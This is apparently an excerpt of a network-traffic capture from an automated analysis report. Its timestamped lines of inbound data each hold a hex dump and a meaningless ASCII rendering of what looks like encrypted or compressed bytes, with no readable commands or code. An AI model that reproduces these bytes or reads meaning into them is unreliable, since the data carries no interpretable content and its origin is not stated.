2021-10-08 15:51:51 UTC	4	IN	Data Raw: 3f 58 8d df 8d 35 9e 5f 5f ee b4 1a 18 db 97 06 8e 03 3a 87 39 af fe 0e 27 00 93 b2 23 ae b0 fc 03 0b 1b ae 19 de b3 d3 87 02 df 33 d4 1b b2 5d 5d 50 d2 df 78 37 43 e2 a3 df 37 f2 71 7e 8e 3b 8a 6b 97 2e 20 3c 48 7f 30 43 c7 58 c0 c9 19 47 7c e0 9b d2 87 0a 88 92 1c 95 e8 2b 0d 29 98 4d ce e6 b5 81 bf bf 29 8c d3 82 8e 3f ff b5 a8 64 81 19 b1 fe 34 3f 2e 6b 6b 59 71 6e 0e 53 54 85 d4 18 4a 11 7a 8e 22 4c f8 0e 82 2d 1e 2d ac 60 68 76 89 93 bb c4 2a 74 c4 d9 99 06 b1 fb eb bb a4 02 de fc e2 48 2c 3e 27 63 87 d5 4c 53 4d 95 2b b9 21 49 57 46 7b 04 8b 4d 75 75 1b f1 af 97 e4 88 70 17 fc 3d bd 12 38 0f 46 1a 22 4e ec cd f2 87 95 e5 73 0c d7 37 ba af 82 a8 26 e2 7a f8 6a db 5d 62 95 d8 b6 1b d5 6d 8e 95 b0 46 0c 9d 3d 86 9b 8b 02 f9 d8 07 f7 90 75 20 25 cf 50 Data Ascii: ?X5__:9'#3]]Px7C7q~;k. <H0CXG\|+)M)?d4?.kkYqnSTJz"L--`hv*tH,>'cLSM+!IWF{Muup=8F"Ns7&zj]bmF=u %P
2021-10-08 15:51:51 UTC	5	IN	Data Raw: 59 62 9a f2 80 5c e6 97 9e 3b 13 e6 ff ab a6 2e 61 03 67 09 0d 0e 90 ea 79 b2 cd 32 48 b4 08 18 62 d3 33 56 e3 2b 12 2e 42 1a 74 49 04 ac 0a f1 21 1c 71 7e 89 45 73 f9 02 e4 c6 8d 5f a6 44 72 ea d0 ec 85 f6 56 b4 2c 56 5e 2d 67 8c 1d f7 57 3e 81 f7 f8 36 d6 b0 50 3d 98 10 96 02 53 3f 8f c4 e3 cf e4 94 0c c9 e6 62 14 ab d1 53 75 82 73 59 1e 4c 5d 7a 91 d1 76 bf 45 84 c3 98 f1 22 0a a3 1a 34 98 af 8e 6c 4d 83 c7 93 cc c3 36 39 57 2c 7a b8 ac ce 83 f8 66 97 88 75 23 a7 bf 4c 56 48 d1 7f 62 66 83 59 79 54 9f a5 d9 71 64 fa 4a 14 8b 8d cd 00 97 91 86 1c 5f 19 43 e8 9b bc 95 c5 00 ab aa 18 9e 28 49 e9 61 1d a4 32 1f e0 d2 e2 b7 d1 fd 3e 84 bc 88 2a e9 03 9b 29 f0 2e b8 a8 1d 28 a4 76 ce c9 b4 7e 95 c6 d8 6f 27 8c 39 b5 cf 1b ad df 08 b2 05 4b 9f f1 96 47 ca 74 Data Ascii: Yb\;.agy2Hb3V+.BtI!q~Es_DrV,V^-gW>6P=S?bSusYL]zvE"4lM69W,zfu#LVHbfYyTqdJ_C(Ia2>*).(v~o'9KGt
2021-10-08 15:51:51 UTC	6	IN	Data Raw: 10 c4 ba ed dd 0e c5 33 e2 8c 44 37 ef e7 9d 94 51 75 43 d6 cf 4a 0a f6 67 62 e8 8e a8 24 bc f1 a2 91 af 48 d0 64 9d 93 88 5f 83 4d 93 dc 0a 50 ac b0 1e 22 3c 2f f7 bc fe 6d 2c 7c db 8e 1a 2e f0 7a bf 20 16 ab 27 f5 30 12 82 83 eb 22 69 6d 4c 02 0a 5c 6e 9c 88 d4 51 a1 d7 e0 9b c2 52 56 b2 11 de d4 f2 ae 1c f0 2c e0 79 20 cf a0 62 73 d2 cf 13 51 c4 52 20 6f b7 7d be ec 56 b8 72 43 30 9b c2 9e 20 8e 38 63 14 89 cd 6b d0 a0 27 64 11 1e 18 97 7c 5d 6e cc eb a0 e9 50 83 d7 9f 9a 9d c6 50 1d 5f 91 a5 9f b9 17 df 50 d5 6d 3c 28 4d 93 8c c2 54 ac bb b7 34 16 5b 73 09 fe 5a 79 4d b5 3b f4 11 0a 7e fe e1 c8 a3 ff c7 b5 31 74 7f bd 8b d1 f0 75 48 20 bc 37 93 07 79 13 b4 5a 94 59 54 f4 34 2f e1 43 cd ec 26 06 1f c7 98 60 61 4b 48 b6 57 76 38 2e 85 f4 f8 36 99 3e 6d Data Ascii: 3D7QuCJgb$Hd_MP"</m,\|.z '0"imL\nQRV,y bsQR o}VrC0 8ck'd\|]nPP_Pm<(MT4[sZyM;~1tuH 7yZYT4/C&`aKHWv8.6>m
2021-10-08 15:51:51 UTC	8	IN	Data Raw: 28 57 14 8b 80 dd 12 dd 6f 7c c0 bc f6 39 05 61 4f 79 6a e8 a7 e7 34 39 f3 fe e6 c8 ec 8a 06 fe fc 0f 36 77 05 7e cb 41 33 eb 2b d0 dd 71 40 22 12 81 ac 41 f9 e6 37 fa 3f a1 c7 5a 44 10 e7 57 1a 2f d2 c3 59 30 39 b9 65 44 0a ed 9d 9d af 93 92 06 fb 84 6c ef 9d c7 21 b2 4e f0 5a e0 ef a0 19 ad e8 d8 c4 b2 37 e6 bd 3c 49 8f a1 e5 33 f0 0b 1b e3 17 7a cc aa 29 bd 26 25 b5 ab d1 25 b1 d2 d0 a6 7e fa 62 b2 5a 99 c8 ac 13 4d dd 6f 2a 19 b1 8e 67 05 2f bc f3 d8 eb 64 9d b6 07 5e 8c 18 88 64 ca ee 32 0d 47 95 d5 24 3f f2 29 f8 3c 5b 58 cb 09 60 dd 09 25 c3 3e 37 e6 bf 3d b8 af be a2 1a 34 13 09 36 6b 7f 47 b2 09 6f 20 44 4e ed f7 c6 88 6d 67 5d 15 10 c3 7e 9b d6 e3 33 bd 62 99 e8 89 ca db 06 f6 41 98 02 fa 79 14 94 57 75 26 70 f5 f1 a2 2a 56 c5 34 2f c1 71 29 88 Data Ascii: (Wo\|9aOyj496w~A3+q@"A7?ZDW/Y09eDl!NZ7<I3z)&%%~bZMog/d^d2G$?)<[X`%>7=46kGo DNmg]~3bAyWu&pV4/q)
2021-10-08 15:51:51 UTC	9	IN	Data Raw: a6 03 7c c6 d9 77 14 a3 ea a7 a0 26 0b 59 30 3f ed ee 2d cd 5c b3 df 52 f6 0f 41 ec 80 fe 58 c2 ba e0 9a 52 bb dd 25 c1 68 85 fc 27 85 da f9 d9 33 bb 2c 5f 5d 1e 71 5d 15 6d 6e d6 b1 f0 24 0e c2 b8 a6 4c 04 99 92 3d a9 8d e7 2c 0b 0e cb 7e d8 da fd e4 c6 ae 58 9e 3b cd 1f 84 33 85 fe 4a 07 54 a8 58 ee 15 52 ec d6 cc 80 e1 4c 60 c3 05 7a e7 0c 85 ad ba f8 5d 55 7e d6 a1 b3 fa 2f a1 b5 98 4d c7 5d 67 1b 98 18 92 59 12 da 9c 4a 50 fa 68 f0 2d 90 76 98 6c ea cd 16 3e 7c ef fc 21 b2 6c b8 a0 38 25 ba 93 8b c7 08 8b bb 0b 4c 7f 47 8f e7 1a 28 61 1f f3 f5 f5 e3 05 76 83 f7 91 88 15 53 0f 59 1e 22 c0 fc 18 d4 c2 e5 71 7d 7f 0a b8 f0 5a bc 86 72 e5 5c a8 26 72 a6 6d 35 fd 80 9c 16 e9 0a 15 53 61 58 f3 f2 c0 a3 e7 53 26 58 a9 ff 84 26 78 c0 d2 c7 12 d6 af 9b eb 05 Data Ascii: \|w&Y0?-\RAXR%h'3,_]q]mn$L=,~X;3JTXRL`z]U~/M]gYJPh-vl>\|!l8%LG(avSY"q}Zr\&rm5SaXS&X&x
2021-10-08 15:51:51 UTC	10	IN	Data Raw: 90 4f 25 b5 9f 73 88 37 bb 7a 95 dc a7 f5 bf 6b 6b 77 4b 86 24 62 81 05 2b 8b b8 ab b5 9b 82 21 e5 45 cc cc 12 81 56 b6 13 72 ee 07 43 ef 86 1c 22 6f 2d 95 84 51 75 21 b5 dd 7b 41 b5 e4 df 6f 56 a2 59 79 11 14 d3 6d 26 4c 00 be ec db 23 be d3 44 5c 9b a0 73 23 a9 c9 73 7f 18 16 d1 44 14 91 b8 ca ea fc 5b 2e 30 37 d4 f2 3f ea 84 2f c8 eb 16 80 df 5c 88 3d a4 0e fb ea bf 0c a6 40 00 ef a6 7e 8d c8 f2 23 bc a7 f1 a2 33 9c 2d 8f d0 bf 53 11 02 e8 d8 b7 d2 86 51 74 f0 5a ae 11 14 90 3d ea ca ad a5 d5 1d fc 03 30 4e 56 c8 85 ae 98 03 6f 7f 11 68 ff 9e 43 a7 dc bc fb dc a9 ac 47 d0 96 54 ba b5 d6 b4 11 2d a1 cf 4d d9 63 18 c6 ca d0 91 d2 c8 80 85 f2 3c 7c d2 c6 ca 9b 99 9a 5c cc 96 f4 7c 8d be a6 24 61 51 78 c2 ba a9 8f ca 9b 95 b8 e9 08 e9 0f 13 55 3e 71 65 44 Data Ascii: O%s7zkkwK$b+!EVrC"o-Qu!{AoVYym&L#D\s#sD[.07?/\=@~#3-SQtZ=0NVohCGT-Mc<\|\\|$aQxU>qeD
2021-10-08 15:51:51 UTC	12	IN	Data Raw: 47 3c 3f 18 91 42 44 8c 48 f9 fb 0b 3e e1 0f 45 83 a9 86 41 b6 15 15 2a 7f 4b da d5 16 ea 94 e9 27 66 de 30 53 f0 51 91 fc b5 a7 65 61 92 7b 10 b6 54 e8 fd f1 e0 bb 00 ab 29 c9 c7 70 28 4c 9a 61 b2 2a bd 57 a5 8e 3f bf 3f 8a 54 e4 e8 a0 a0 2d 54 ed 61 7d 91 ca 30 65 b0 03 ca c7 9c 5a 35 93 07 01 78 d8 b6 50 dd 2e 13 0f 1c 64 c1 49 ba df 5e c5 47 94 45 88 d0 ed c9 4f 01 1a de 86 b9 63 39 a4 99 df 44 04 ce df 9b d4 16 a0 1d e8 b5 a6 10 be 5d 78 6a ac 1f c8 97 9b d1 17 04 ff 1d dc 63 56 2d e9 d7 2c 8d c9 9b dd ea 9e ea ae 58 f5 bf 48 50 e1 47 99 cf 59 37 ea 8e 45 9d d8 f4 4e b3 98 38 2b bc d3 2a 79 43 9f f4 33 ef a1 a6 73 71 2d cf 10 c4 ec 80 87 fa 3b f1 a5 a8 76 d1 13 0f 45 95 9c 44 13 55 3e 71 65 44 12 da a2 3c 71 29 df 6e e4 c8 8c 6f 60 8f b2 57 78 c0 b8 Data Ascii: G<?BDH>EAK'f0SQea{T)p(LaW??T-Ta}0eZ5xP.dI^GEOc9D]xjcV-,XHPGY7EN8+*yC3sq-;vEDU>qeD<q)no`Wx
2021-10-08 15:51:51 UTC	13	IN	Data Raw: 66 99 9e 38 7c d3 6e eb 14 d3 6a bc f7 bf 39 bf 6c b7 8e 3f ff 87 f0 2b 9d 90 5c 8f e3 57 6e b4 50 aa 75 6f 2c 54 a4 20 65 1f ec 8a 21 bf 33 eb 02 fa 3c 79 4d 90 06 ff d3 3c 71 7d 03 31 c5 6f 74 fe 04 b5 d5 76 ce c9 05 2f 86 71 2f 90 0c c9 19 fd dd 72 a8 2d 95 d0 cd 03 66 99 9e 38 7c d3 6e eb 14 d3 6a bc f7 bf 39 bf 6c b7 8e 3f ff 87 f0 2b 9d 90 5c 8f e3 57 6e b4 50 aa 75 6f 2c 54 a4 20 65 1f ec 8a 21 bf 33 eb 02 fa 3c 79 4d 90 06 ff d3 3c 39 9e 13 20 74 b8 d2 ec 92 77 54 bf 49 a2 12 a4 7f 23 ca f9 f3 ab d1 0c 94 7b 02 9a 1d a1 ad 89 db 0c b5 a0 72 e5 59 29 97 87 b5 be cf 7e cf 70 eb 41 a7 9f fa 57 5e e0 dc ef b7 cd 0f 2b e4 ac 23 a6 2e 5b 70 81 2f d0 de 89 dc b8 d2 8f ad be d9 16 af c5 4b a9 8e 74 f9 ac 53 7b 3f b2 22 32 14 91 cd 67 65 6f 09 64 f6 5e e0 Data Ascii: f8\|nj9l?+\WnPuo,T e!3<yM<q}1otv/q/r-f8\|nj9l?+\WnPuo,T e!3<yM<9 twTI#{rY)~pAW^+#.[p/KtS{?"2geod^
2021-10-08 15:51:51 UTC	14	IN	Data Raw: 56 f8 1a 6d 4c 3a 51 1a 04 bc 8a 74 dc bb 07 3f dd 3f dd 79 68 ae 68 a5 d2 cf 37 a5 d2 9f c4 e4 ea 96 2e 55 12 9c 3d f8 1a 6b 47 9f c4 c9 29 bb 07 33 c0 fe 28 47 f0 69 42 01 48 1f 90 49 f5 f5 93 87 8a 75 5f 43 e6 83 80 98 33 b6 7b 03 4c 35 c5 0f 69 26 21 fb a1 bc 8a 7e f4 76 e1 43 e6 9b ba ea f8 74 dc f7 98 56 94 45 eb 12 f1 cf 37 c4 9d db 54 aa 5e 87 8a 63 33 af ea 8a 11 1c 09 3e 5a be 8e 54 8f b2 72 91 a2 47 f0 7e f4 62 b1 80 f9 f1 89 ea f8 77 64 96 2e 52 8b fb a1 e9 76 95 ac 16 fa 50 86 05 51 6d 4c 09 5b 4c 7c 91 a2 3d d8 ed 80 8b 94 4c 7c 97 b1 8a 11 1a 04 a1 c9 40 5f 0a dd 3d d8 a4 50 ea f8 7b 6d 3a 51 28 26 40 5f 0a dd 2d b2 1d 8b fa 1f b0 6d 3f dd 30 39 ee 02 ed 80 8a 11 4b fa 38 4c 5d 25 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 Data Ascii: VmL:Qt??yhh7.U=kG)3(GiBHIu_C3{L5i&!~vCtVE7T^c3>ZTrG~bwd.RvPQmL[L\|=L\|@_=P{m:Q(&@_-m?09K8L]%Al)ZAl)ZA
2021-10-08 15:51:51 UTC	16	IN	Data Raw: 32 3e 2f b6 08 d9 6f 50 f2 0c 8d 99 db 54 af ea 96 2e 5b 20 7b 6d 38 4c 1d 8b e6 ef e1 63 43 e6 a0 46 79 68 a5 d2 cf 37 b3 f4 64 b6 5b 20 66 bb 69 42 05 51 61 2f c4 9d de db 22 17 5d 25 fa 1f f9 9c 51 08 b8 80 8f 9d d1 3c 1f 90 34 42 10 ec 93 a7 b2 72 b5 f9 e9 76 86 08 ab e1 02 ca 8b 94 4d ff c2 98 5f 2a 4b fa 69 42 0a dd 10 ec ed 80 8e 1b e9 76 8d 99 d3 41 90 20 77 64 c0 93 c8 a7 f7 98 47 f0 69 42 05 51 61 2f c4 9d de db 02 ca bb 07 7f 77 17 7d 57 17 55 12 d1 3c 33 c0 e3 67 44 69 36 47 d0 ba ea f8 6e ce db 54 e6 ef a4 50 af ea 8b 94 0c e2 cd 33 e0 e0 85 85 f5 93 de db 20 12 d1 3c 30 39 a1 c9 09 5b 54 8f f3 8e 7a eb 12 f1 fb a1 a8 5a e8 f4 30 39 a9 dc b9 02 a3 cd 47 f0 75 5f 4f 03 3a 51 66 bb 68 c0 f0 07 76 e1 06 d4 af ea 91 a2 23 99 c2 98 13 73 2d b2 1d Data Ascii: 2>/oPT.[ {m8LcCFyh7d[ fiBQa/"]%Q<4BrvM_*KiBvA wdGiBQa/w}WU<3gDi6GnTP3 <09[TzZ09Gu_O:Qfhv#s-
2021-10-08 15:51:51 UTC	17	IN	Data Raw: 09 3a 51 7d 72 b6 7b 0c e2 af ea ff ab 82 fe 4d ff ef 84 00 c5 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 74 dc a2 4b 96 2e 55 12 87 8a 31 bb 7e f4 64 b6 09 5b 45 eb 0b 60 c3 1a 76 e1 13 73 7a eb 1f 90 49 f5 ff ab 80 f9 ea f8 74 dc 9e 41 f4 10 9f c4 b8 80 d9 4f 2d b2 50 86 7b 6d 69 42 46 6e ee 02 af ea 94 29 c1 16 9c 3d f8 1a 6a c4 f8 1a 74 dc b8 80 d9 4f 77 64 d9 4f 6d 4c 12 f1 e8 f4 53 0d 7c f0 74 dc f2 0c c2 98 1d 8b b6 7b 1e 0d 40 5f 08 d9 6f 50 e3 67 51 08 b0 6d 2a 2a 0a dd 3c 56 e0 e0 81 7c 95 ac 11 6e ad e6 cf 37 be 8e 74 dc b9 02 a4 50 e7 71 16 fa 04 cf 44 69 27 a3 b9 02 ab e1 00 c5 76 e1 0f 69 32 3e 2f b6 1f 90 00 c5 68 c0 fc 24 70 d3 2d b2 13 73 7a eb 0f 69 2d b2 1c 09 7b 6d 3f dd 3c 56 Data Ascii: :Q}r{M n=3K tK.U1~d[E`vszItAO-P{miBFn)=jtOwdOmLS\|t{@_oPgQm**<V\|n7tPqDi'vi2>/h$p-szi-{m?<V
2021-10-08 15:51:51 UTC	18	IN	Data Raw: dc d5 66 bb 07 56 97 b1 ef 84 07 56 94 29 a8 5a 9e 41 e2 65 38 4d df 5e a7 c7 24 9c 3d d9 47 f0 07 59 e4 6a c4 9d 4f 03 4c 73 a4 d0 ba 85 5d 25 9e 4e 7c 70 d3 41 22 17 7d 7d 8e 9b ba 85 2d b2 72 d7 b0 ed 80 f9 0c e2 e5 63 c9 29 af ea f8 1a 04 cf 33 c0 93 a7 d7 4b fa 1f 90 a0 46 6e a6 55 12 f1 83 00 c5 1f b0 6d 4c 7c f6 15 7a eb 7b 6d 4c 7c f4 10 ec fd a6 55 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 Data Ascii: fVV)ZAe8M^$=GYjOLs]%N\|pA"}}-rc)3KFnUmL\|z{mL\|Un=3K n=3K n=3K n=3K n=3K n
2021-10-08 15:51:51 UTC	20	IN	Data Raw: 2a 58 99 da d2 cd 33 b2 72 bd 0c c2 98 58 99 d6 c8 c2 98 5b 20 71 55 32 3e 3f dd 3e 5a f0 07 37 ca f9 9c 2c 2f d9 4f 71 55 77 64 cc b0 4d ff d2 bf 73 5a be 8e 75 5f 45 eb 12 f1 fa 1f f9 9c 4b fa 76 e1 27 a3 dd 59 6f 50 f3 8e 6b 47 9e 41 8b 94 09 5b 43 e6 86 08 ab e1 06 d4 ae 68 b5 f9 f2 0c c2 98 57 17 14 f5 ff ab 80 f9 ea f8 74 dc 9e 41 f7 98 5f 2a 46 6e bb 07 30 39 ee 02 a1 c9 5a 9e 28 26 65 38 45 eb 1e 0d 09 5b 49 f5 f5 93 87 8a 77 64 d9 4f 23 99 d1 3c 38 4c 19 81 5c a3 a9 dc b9 02 a5 d2 c6 a2 2e 34 20 12 d1 3c 32 3e 3b d3 24 1c 5b 20 05 51 6c c9 4c 7c 99 b5 97 b1 8a 11 0a dd 79 68 b3 f4 63 33 a5 d2 dc d7 28 26 40 5f 0a dd 3c 56 f8 1a 6d 4c 3a 51 1a 04 bc 8a 74 dc bb 07 3f dd 3f dd 79 68 ae 68 a5 d2 cf 37 a5 d2 9f c4 e4 ea 96 2e 55 12 9c 3d f8 1a 6b 47 Data Ascii: X3rX[ qU2>?>Z7,/OqUwdMsZu_EKv'YoPkGA[ChWtA_Fn09Z(&e8E[IwdO#<8L\.4 <2>;$[ QlL\|yhc3(&@_<VmL:Qt??yhh7.U=kG
2021-10-08 15:51:51 UTC	21	IN	Data Raw: 5a 9e 61 2f d8 cd 5c a3 a4 50 f2 0c 92 25 fb a1 aa 5e df 5e e2 e5 70 d3 25 9e 24 1c 7d 72 aa 5e c8 a7 a7 d7 3b d3 34 42 17 7d 52 8b e0 e0 8f 9d d1 3c 76 e1 06 d4 a0 46 0f 69 24 1c 7b 6d 29 a8 2e 34 2c 2f ff ab f6 15 1c 09 3e 5a f2 0c 8b 94 48 73 3c 56 b4 76 8f 9d d0 ba ec fd d2 bf 63 33 a5 d2 cc b0 1e 0d 24 1c 19 81 04 cf 12 f1 a9 dc b9 02 a5 d2 d6 c8 d3 41 92 25 fb a1 aa 5e df 5e c2 98 13 73 36 47 91 a2 25 9e 33 c0 f6 15 0c e2 9d bf 54 8f 88 0d 17 7d 1d 8b e6 ef f6 15 1d 8b b4 76 95 ac 0d 65 59 1b ef 84 71 55 73 5a e8 f4 30 39 aa 5e c2 98 47 f0 64 b6 1e 0d 15 78 9e 41 87 8a 7f 77 31 bb 1f 90 44 69 27 a3 b9 02 b8 80 96 2e 44 69 32 3e 2f b6 08 d9 6f 50 f2 0c 8d 99 db 54 af ea 96 2e 5b 20 7b 6d 38 4c 1d 8b e6 ef e1 63 43 e6 a0 46 79 68 a5 d2 cf 37 b3 f4 64 Data Ascii: Za/\P%^^p%$}r^;4B}R<vFi${m).4,/>ZHs<Vvc3$A%^^s6G%3T}veYqUsZ09^GdxAw1Di'.Di2>/oPT.[ {m8LcCFyh7d
2021-10-08 15:51:51 UTC	22	IN	Data Raw: 56 94 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 4c 7c 85 85 d1 3c 55 12 9f c4 f2 0c af ea fb a1 a7 d7 3e 5a cd 33 c3 1a 76 e1 06 d4 a1 c9 44 69 27 a3 ae 68 a5 d2 fb a1 c1 16 88 0d 00 c5 7d 72 b5 f9 f9 9c 4b fa 70 d3 0f 69 4a 77 16 fa 7a eb 19 81 13 73 2e 34 21 95 e3 67 3a 51 7a eb 1e 0d 07 56 f9 9c 58 99 c1 16 8a 11 0b 60 ff ab e8 f4 64 b6 08 d9 3a 51 6f 50 f3 8e 5a 9e 47 f0 7e f4 7c f0 72 d8 87 8a 15 78 83 80 97 b1 9a 38 06 d4 c7 24 65 38 2d b2 3f dd 5a 9e 2d b2 1b 86 7a eb 0b 60 ed 80 fc 24 74 dc b4 76 93 a7 b6 7b 20 12 f4 10 95 ac 11 6e af ea 8d 99 c7 24 7e f4 75 5f 6c c9 21 95 d5 46 1c 09 3a 51 7d 72 b6 7b 0c e2 af ea ff ab 82 fe 4d ff ef 84 00 c5 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 Data Ascii: V)ZAl)ZAl)ZAlL\|<U>Z3vDi'h}rKpiJwzs.4!g:QzVX`d:QoPZG~\|rx8$e8-?Z-z`$tv{ n$~u_l!F:Q}r{M n=3
2021-10-08 15:51:51 UTC	24	IN	Data Raw: 3d d9 ff ab e1 63 33 c0 92 25 9e 41 e2 e5 6c 9a 04 ef dd 59 1b 86 08 d9 4f 02 6a c4 9d bf 11 6e cf 37 ca ab e1 63 33 93 9b 9a 61 2f b6 7b 6d 4c 7c f1 19 81 7c f0 07 56 95 ac 63 33 c0 93 a7 84 3f fd ff ab e1 63 33 c0 93 a6 d5 46 6e ce b5 f9 9d bf 11 6e ce b5 f9 cf 0b 40 06 d4 c3 1a 04 cf 37 cb 5e a7 d7 4b fa 1f 91 a2 4b fa 1f 90 20 41 de fb f8 1a 04 cf 37 ca ab e0 80 f9 9c 3d d8 cd 32 3e 5a 9e 41 e2 e5 3f e1 43 bf 11 6e ce b5 79 68 c1 5e 27 a3 cc 4e 01 48 72 e8 74 dc d6 38 4c 7c f0 05 51 08 d9 4f 50 ba a5 8b 94 29 a8 5a 1e 0d 64 ae 68 c0 83 80 79 68 c1 16 fa 1f 9f 3b 53 0d 65 d0 ba 85 8a ef 04 cf 37 1a 04 cf 38 b1 6f 50 86 b0 6d 4c 73 a6 d5 46 6e 6e ce b5 f6 ee 82 fe 28 ae 68 c0 9c c7 24 1b 86 08 d9 4f 03 4c 2f 8a 31 e2 e5 6c c9 29 28 26 21 fd a6 55 12 fb Data Ascii: =c3%AlYOjn7c3a/{mL\|\|Vc3?c3Fnn@7^KK A7=2>ZA?Cnyh^'NHrt8L\|QOP)Zdhyh;Se78oPmLsFnn(h$OL/1l)(&!U
2021-10-08 15:51:51 UTC	25	IN	Data Raw: c7 11 5c 8a 23 87 b8 92 17 7c c1 e4 db b1 de 00 f4 d4 f2 a4 61 8c 27 3e 6b df 6f c2 a9 51 39 ae 59 41 d3 14 c4 b9 33 de ea e1 53 f1 b9 de eb d3 71 ce 85 16 ca 25 ae 15 48 0b 50 e8 c4 c7 14 a0 76 aa 6e 88 3d e1 53 3e 6a e2 d5 66 8b 87 ba 88 3d d8 cd 33 c1 5e a7 d6 a8 5a 9e 41 dd a3 f2 e1 5c 44 56 4e be 5a a1 0e d8 0c dd ed bf bf 2e 95 93 3c 69 cc 8f 15 47 8e 24 64 89 e4 d5 1d b4 3b ec bd 33 f3 b1 c9 16 e3 58 97 8e 1a 3a bd 32 d6 f6 f1 b7 1e 33 18 c1 c6 9c f1 b7 36 79 ac 5d e5 52 37 f4 a8 64 02 f4 a0 78 4a 49 5d 1b 22 29 08 e7 ed be 16 c4 09 65 a8 64 3a 6f d8 f3 0a e3 e7 4f 7f 49 8d a7 a3 f3 fe 16 96 10 84 3d bc b4 16 c4 c1 28 7e ca ff 95 fc 1a 48 4d b7 c0 d7 75 1f ae 54 b1 d7 75 79 56 80 c7 2d 8f 62 8c e2 d8 27 9e a1 f4 c6 9f 0f 54 cc 8d aa 63 27 9f 3b ef Data Ascii: \#\|a'>koQ9YA3Sq%HPvn=S>jf=3^ZA\DVNZ.<iG$d;3X:236y]R7dxJI]")ed:oOI=(~HMuTuyV-b'Tc';
2021-10-08 15:51:51 UTC	26	IN	Data Raw: a7 ea 40 62 1d b6 f2 31 cf 0a bc b7 a3 f0 4b c7 1e 30 0f 54 a3 f0 2f 8b b0 50 a6 68 dc ea e0 dd 4d c2 88 30 35 f8 12 cc b4 4b fa 23 61 13 87 b6 93 9b 62 8d 51 34 86 34 82 c2 24 20 aa 62 05 6d fc 18 53 31 13 4f a3 f1 09 67 49 c9 59 27 cf 0b 08 e5 08 e5 0c de 87 b6 23 a5 86 34 12 cd 7f 4b b2 4e c5 23 a5 ee 1e 31 bf 2d b2 49 09 60 54 b4 82 c5 ef bf fd 9d 57 2c cb 15 a4 6b fb 9a 94 12 59 20 b6 40 ff 90 bc b1 77 5f be b5 69 79 e4 d1 b8 bb 63 08 8d a2 1b bd 40 64 fe 13 37 f1 c9 12 cd 08 e1 58 ad dd 75 64 ba bf ed ba 7d 48 87 b0 9d 85 69 78 0e dd bd 36 a7 ed 5c 99 61 15 cc 8a b5 c3 ba bf 8d a3 55 28 b2 48 e3 5d a9 e6 67 07 d2 85 f9 a6 09 61 63 09 13 49 b1 d5 06 ee 3e 60 94 13 47 ca 9b 80 d5 7c d4 f9 98 0a 2d 8b 78 df b6 42 80 c0 73 63 ef bd d4 fa cb 17 ad df 96 Data Ascii: @b1K0T/PhM05K#abQ44$ bmS1OgIY'#4KN#1-I`TW,kY @w_iyc@d7Xud}Hix6\aU(H]gacI>`G\|-xBsc
2021-10-08 15:51:51 UTC	28	IN	Data Raw: 04 19 b9 af d2 1f a8 30 01 09 63 07 61 d1 0b fa 28 b4 41 68 f7 1a 33 ba b2 1a 33 9b 8d d6 ff e9 41 d2 88 2e 03 5b 16 0f 5f c6 94 1f a5 d0 8e ee 36 86 3b 74 ee 1a 36 44 58 2a 1b 18 ce ea c9 67 0c c0 a2 4f 33 1a 34 86 38 fa 2f 18 cf af da 40 6f d0 8a 62 81 1b b6 39 ce b5 f8 32 3e 5a 4e 81 42 68 fc 97 8d cf 0b 2e 08 e5 50 a9 e0 c3 21 42 5f 9b 81 d0 81 d8 f6 8c 2d 3d e3 e0 db 2f 8d fd 9d ed bb 4f 38 72 e3 53 36 6d 77 44 52 9d 84 0f 52 89 b5 01 72 36 7d 91 98 ea c2 56 ae ac 59 a2 71 fa 25 3a 6b dd 63 bc b0 e8 ce ca 91 d7 71 3a 6b 22 2d e9 4c 2c 15 3e 60 97 8b a5 e8 d2 85 97 8b 93 9e ba bc 66 82 16 c3 fa 26 fd 9f 10 d5 96 17 b5 c0 57 2e 88 34 fa 26 91 9b 16 c3 be b7 5e 9e d9 76 75 66 37 f3 06 ed 00 fc 58 a0 32 07 26 18 97 88 69 7b 31 82 a6 6c 99 8c 5a a7 93 9e Data Ascii: 0ca(Ah33A.[_6;t6DX*gO348/@ob92>ZNBh.P!B_-=/O8rS6mwDRRr6}VYq%:kcq:k"-L,>`f&W.4&^vuf7X2&i{1lZ
2021-10-08 15:51:51 UTC	29	IN	Data Raw: 26 14 fd 92 d5 72 34 76 09 6f b4 42 84 37 16 ce 6d 78 32 0a 0d 51 c0 a7 7f 43 7e c0 07 62 21 a1 45 df d6 fc a0 72 58 ad 9a 0c 9a 0c 92 11 3e 6e f2 38 74 e8 c0 a7 e7 45 c7 10 c4 a9 f8 2e 14 c1 0a e9 62 82 0a ee e2 d6 14 c6 7a d8 19 b2 a2 78 2a 19 49 c6 66 88 cd 00 7d 41 7a d8 4d cc cc 83 f8 29 dc e4 9a 0b 0c d1 54 bc ee 31 db 67 65 0b 58 aa 7a d8 ed b3 e8 c7 3c 65 2c 1c 19 b2 7e c7 2c 1c 0d 57 eb 49 29 9a f4 22 df 6c 0d 57 d7 79 d4 f1 31 89 3b e1 d3 73 f6 27 07 64 32 0c 92 17 11 5c cb 1c 6d 7e 94 1b da e0 b8 b2 26 13 23 ab a9 ee 2a 18 e7 43 f2 3e 4a 45 e7 43 ee 30 3d ea f8 2b 51 39 36 76 11 5f fa 2e 8c 27 17 4c cc 81 d0 8b 3c 67 99 84 a3 fc b8 b1 77 55 82 cf 47 c1 4a 46 36 76 b5 c8 f7 a9 90 11 26 10 a8 6b 07 67 01 79 5c 92 31 8a 11 5e 5b 10 14 c5 eb 4b 0a Data Ascii: 